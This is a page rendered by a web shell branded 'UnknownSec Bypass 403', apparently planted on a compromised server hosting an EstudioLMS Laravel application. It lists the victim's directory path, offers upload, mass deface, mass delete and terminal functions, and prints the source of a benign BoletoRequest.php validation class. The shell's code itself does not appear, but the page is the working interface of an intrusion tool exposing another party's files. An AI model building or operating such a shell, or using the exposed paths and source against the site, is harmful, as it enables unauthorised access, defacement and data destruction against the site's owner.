UnknownSec Bypass
403
:
/
mnt
/
lmsestudio-instance-vol002
/
lms_db26c64f3516
/
app
/
Http
/
Requests
/
Admin
/
Config
/ [
drwxr-xr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
BoletoRequest.php
<?php namespace EstudioLMS\Http\Requests\Admin\Config; use EstudioLMS\Http\Requests\Request; /** * Class BoletoRequest * @package EstudioLMS\Http\Requests\Admin\Config */ class BoletoRequest extends Request { /** * Determine if the user is authorized to make this request. * * @return bool */ public function authorize() { return true; } /** * Get the validation rules that apply to the request. * * @return array */ public function rules() { return [ 'bank_fee' => 'required|regex:/^\d{1,3}(?:\.\d{3})*,\d{2}$/' ]; } public function attributes() { return [ 'bank_fee' => 'Taxa de Emissão de Boleto' ]; } }
Copyright © 2026 - UnknownSec